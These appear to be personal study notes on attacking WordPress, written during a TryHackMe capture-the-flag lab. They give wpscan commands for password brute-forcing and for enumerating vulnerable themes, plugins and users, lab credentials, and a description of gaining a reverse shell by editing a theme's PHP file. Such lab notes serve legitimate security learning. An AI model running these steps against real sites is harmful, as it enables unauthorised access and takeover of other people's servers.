Wordpress Exploitation
Learnt while Tryhackme: MrRobot. Will be updated as I keep learning newer thing
1) Enumeration
A) Bruteforce and login
sudo wpscan --url http://10.10.67.231/wp-login --usernames Elliot --passwords /home/kali/tryhackme/mrrobot/fsocity-sorted.dic
B) Vulnerability Scanning
wpscan --url yourwebsite.com -e vt (Vulnerable themes) (-e=enumerate)
wpscan --url yourwebsite.com -e vp (Vulnerable plugins)
wpscan --url yourwebsite.com -e <options> --api-token YOUR_TOKEN (Authenticated scan)
wpscan --url yourwebsite.com -e u (Enumerate Users)
2) Exploitation
There exists many exploitation mechanisms. First, I'll talk about editing the PHP code in the theme. Scenario: I was able to find credentials=> Elliot:ER28-0652 I logged in to the admin panel and found out the code for the theme was editable
I simply edit this file and add my own reverse shell code here
Successfully gained reverse shell
Last updated
